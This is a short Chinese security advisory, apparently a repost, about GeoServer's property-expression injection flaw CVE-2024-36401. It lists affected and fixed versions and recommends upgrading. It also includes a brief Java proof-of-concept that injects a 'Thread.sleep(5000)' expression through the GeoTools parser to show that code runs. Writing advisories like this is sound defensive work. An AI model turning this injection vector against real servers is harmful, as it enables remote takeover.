【漏洞预警】GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

admin 2024年7月3日07:33:13评论3 views字数 620阅读2分4秒阅读模式

【漏洞预警】GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

漏洞描述:

GeoServer是一个功能齐全,遵循OGC开放标准的开源WFS-T和WMS服务器,攻击者可构造恶意请求执行任意java代码,控制服务器。

【漏洞预警】GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

poc:

new org.geotools.xsd.StreamingParser(
                        new org.geotools.filter.v1_0.OGCConfiguration(),
                        new java.io.ByteArrayInputStream("<Filter></Filter>".getBytes()),
                        "java.lang.Thread.sleep(5000)")
                .parse();

影响范围:

2.25.0 <= GeoServer < 2.25.2
2.24.0 <= GeoServer < 2.24.4
GeoServer < 2.23.6

安全版本:
GeoServer 2.25.2
GeoServer 2.24.4
GeoServer 2.23.6

修复建议:

建议您更新当前系统或软件至最新版,完成漏洞的修复。

参考链接:

https://osgeo-org.atlassian.net/browse/GEOT-7587

原文始发于微信公众号(飓风网络安全):【漏洞预警】GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月3日07:33:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞预警】GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)http://cn-sec.com/archives/2911828.html

发表评论

匿名网友 填写信息